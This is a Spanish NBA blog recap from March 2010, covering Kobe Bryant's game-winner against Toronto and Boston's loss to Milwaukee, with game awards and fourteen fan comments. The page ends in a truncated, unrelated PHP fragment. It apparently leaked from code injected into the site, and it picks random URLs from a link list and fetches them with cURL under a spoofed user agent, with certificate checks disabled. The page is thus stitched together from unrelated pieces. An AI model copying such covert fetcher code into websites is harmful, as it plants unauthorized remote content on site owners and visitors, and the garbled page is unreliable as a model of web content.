La Crónica (09/03/2010)

10 de March de 2010 por TheDeerHunter

Déjà vu.

No nos costaría imaginarnos la jugada con una figura de otra época. Una figura sutilmente distinta en su fisonomía. El toro rojo. El número 23. Jordan no tuvo tantas ocasiones para mostrar su faceta de depredador supremo en el filo de la navaja. Supongo que la filosofía era otra. Sin embargo la ejecución y resolución de la jugada nos retrotrae inevitablemente a su recuerdo. Tampoco hace falta viajar tan lejos porque casi hemos perdido la cuenta de cuantos partidos ha matado Kobe en el último instante este mismo curso. Podríamos quizás atrevernos a calificar la de anoche como la más bella y más difícil de todas ellas.

Pocos segundos antes, Bosh había llevado el partido al limbo con un triplazo a pase de Calderón. Con casi 10” es difícil creer que los Raptors no sabían lo que se les venía encima. Casi podríamos decir que ya es un procedimiento estándar. No se les puede reprochar nada. DeRozan muy encima de la marca, Bargnani acude rápido a la ayuda, Kobe se escora al lateral para evitar el trap, logrando unos mínimos centímetros de separación… y el clásico sonido de la red cuando el balón la atraviesa impoluto. No va más.

Mientras tanto, al otro lado del continente americano, otra situación se vivía como un espejo. El balón le llega a Pierce para empatar o ganar contra los Bucks en el Bradley Center de Milwaukee. La jugada casi calcada, aunque no tan escorada. Pierce se libra fácil de su par, pero Bogut acude presto a la ayuda y logra estorbar lo suficientemente el lanzamiento como para provocar el fallo.  Es difícil pensar que en otra época lo hubiera fallado como también que un pívot como Bogut les hubiera podido dar una tunda como la de anoche. Son malos tiempos en la casa del trébol. Antes de llegar a ese punto un conato de bronca entre Jennings y Glen Davis (sí, lo habéis oído bien) azuzó a los Bucks para abrir en el último cuarto una brecha en el marcador. Los Celtics nadaron hacia la remontada, pero se ahogaron en la orilla. Finley debutó con 8 intrascendentes minutitos, por cierto.

El resto de la jornada quedó un poco oscurecida por estos dos partidos. Los Magic destrozaron a los Clippers,;los Jazz a Chicago; Blazers ganaron Kings; los Bobcats lograron una decisiva victoria contra los Heat; Sixers ganaron a Pacers y Rockets a Wizards.

PREMIOS

MVP: Hoy hay empate. Kobe 30 puntos, 6 rebotes y 6 asistencias junto a una de las canastas del año. Bogut, que está haciendo una temporada de nº1 del draft por derecho propio, arrasó el juego interior de los Celtics con 25 puntos y 17 rebotes. Otros nominados: Deron Williams 28 puntos-17 asistencias y Dwight Howard con 22 puntos 15 rebotes.

El Rookie: Hoy nos quedamos con un no-habitual. Los 21 puntos y 4 asistencias de Jrue Holiday no sirvieron para lograr la victoria contra los Pacers. Sí sirven un poco para mirar al futuro con más optimismo tras las preocupantes noticias que se oyen sobre Allen Iverson.

La sorpresa: El combo Dahntay JonesBrandon Rush. 29 puntos y 13 rebotes entre ambos que catapultaron a su equipo a la victoria. Lástima que ambos sean tan tremendamente irregulares… como todos los Pacers, en general, este curso.

La decepción: Uno de los factores de la mejor imagen de los Celtics estos últimos partidos había sido la aportación de Ray Allen. Anoche sólo le alcanzó para fallar 3 ridículos lanzamientos que dispuso en 34 minutos de juego. No es normal.

El mayor esfuerzo en vano: Nos quedamos con el MVP del Este la semana pasada. Wade en modo MVP es mucho Wade… pero su equipo es el mismo.

Comenta

14 comentarios a esta entrada

  1. kantonyo dice:
    #1

    Interesante articulo de Marc Gasol en su blog sobre los pívots de su generación:

    http://www.marca.com/blogs/marc-gasol/2010/03/09/asi-veo-a-mis-companeros-de-generacion.html

      Citar

  2. Txusma dice:
    #2

    Sí, para él todos son buenos…
    Lo curioso es ver los comentarios de la gente. Q pelotas somos todos!! 😀

      Citar

  3. sergio dice:
    #3

    Hombre Txus… es q todos son buenos. Otra cosa es compararlos a unos con otros, que ya empezarian a flojear jajaj.

    No recuerdo a ningun jugador decidir tantos partidos como Kobe este año… esta empezando a rayar lo sobrenatural

      Citar

  4. Love Denise dice:
    #4

    kobe inmenso, pero con la plantilla que tienen los angelinos, no deberían darse todas estas situaciones de llegar ajustado al último segundo, y más en casa contra equipos débiles como Toronto, Miami o Sacramento. Y me parece indecente que otros no asuman tiros en los minutos finales, parece que Kobe es el unico que tiene eggs y no le queman las manos. Otra vez Pau con técnica y llorón, algunos pensaréis que es bueno para hacerse respetar por los arbitros, y a lo mejor teneis razón, a mi personalmente, no me gustan este tipo de jugadores, y no creo que a Pau le haga falta ir llorando para hacerse valer.
    Veo a Bosh “aburguesado” en los Raptors, sin progresión y un poco estancado, como en su día Pau con sus Grizzlies. A ver si este verano ficha por un equipo con aspiraciones reales al anillo, y gana en motivación y agresividad.
    Pienso que los Raptors van a tener en años venideros un panorama desolador, Bosh se pira este verano, Toronto no es una ciudad muy atractiva para agentes libres, y encima han hipotecado el salario con contratazos como los de Turkoglu, Bargnani y Calderón, No sé, quizás a Calde hasta le venga bien jugar mal para así, haber si lo traspasan a otra franquicia.

      Citar

  5. pcerezo dice:
    #5

    Kobe es un paraguas al cual agarrarse en temporada regular…Phil Jackson no presiona, los ajustes van a venir en una hipotética final contra Mavericks, puede ser tremenda.

    Estoy de acuerdo con lo de Bosh, me gustaría verle en empresas más grandes, en finales de conferencia o finales para ver su verdadera naturaleza competitiva, que no dudo que sea mucha.

    Muy buena temporada de Bucks tras un mes de enero malo…buen record y cuidado que si llegan a ser quintos una primera ronda con Celtics o Atlanta está abierta…no sé como lo veis?

    Un saludo a todos…
    Pablo

      Citar

  6. Txusma dice:
    #6

    Con Atlanta la cosa que puede estar abierta pero creo que los Celtics se los comerían con patatas. Garnett, Pierce, Allen, Rashedd, Finley, etc… abusarían de los pipiolos. Me da que los Bobcats les pondrían en más problemas.

      Citar

  7. Love Denise dice:
    #7

    suponiendo que Celtics y Hawks estén con sus plantillas completas y sin lesionados de importancia, creo que son semifinalistas junto con Magic y Cavs sin apuros. No veo gran nivel en el Este más allá de estos 4, otra cosa es que Garnett esté al 50%, entonces, ya si que los Bucks tendrían alguna opción.

      Citar

  8. Toni dice:
    #8

    De momento estos Bucks ya le han enseñado los cuernos a los verdes.
    Lo de los Lakers esta comprovado, si el partido empieza a las 4:30 tienes que levantarte a las 6 para ver el último tiro de Kobe. Creo que es bastante preocupante el bajon de rendimiento de los Lakers en Marzo en el que acumulan un balance de 2-3 y ya se que futbol y basquet no son equiparables pero al ver estos Lakers me viene a la cabeza el barça hexacampeón que va de mal en peor, al habla un culé.

      Citar

  9. Love Denise dice:
    #9

    pues si el barça hexavampeón va mal….apaga y vamonos, es cierto que no golean como el año pasado, pero sigo pensando que van a ganar la Liga con la gorra, y en la Champions son los favoritos, claro que hay muchos intereses para que el Madrid dispute su “final” en el Bernabeu, como pasen algun apuro esta noche ante el Lyon, ahí estará el arbitro para echarle una manita. Y si no, al tiempo.

      Citar

  10. sayim dice:
    #10

      Citar

  11. Txusma dice:
    #11

    Love, no saquemos el futbol q es carnaza para trolls… 😀

      Citar

  12. Viva_Dirk dice:
    #12

    Gasta cojones, menudas ayudas ha recibido el Madrid en la Champions las últimas temporadas.

    Espectacular Kobe y esperando ajustes en Lakers.

      Citar

  13. arivas dice:
    #13

    Os jugariais mucha pasta a que los Lakers mantien el liderazgo en la oeste??

    Dallas empieza a austar.

      Citar

  14. Tobal dice:
    #14

    Los Bucks están en un gran momento de juego y resultados,el fichaje de Salmons ha sido clave porque se trata de un jugador anotador,aspecto que los Bucks necesitaban.Yo pienso que si quedan quintos,pueden darle guerra tanto a Celtics o Hawks,aunque es pronto para asegurar que van a quedar así como estan ahora mismo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>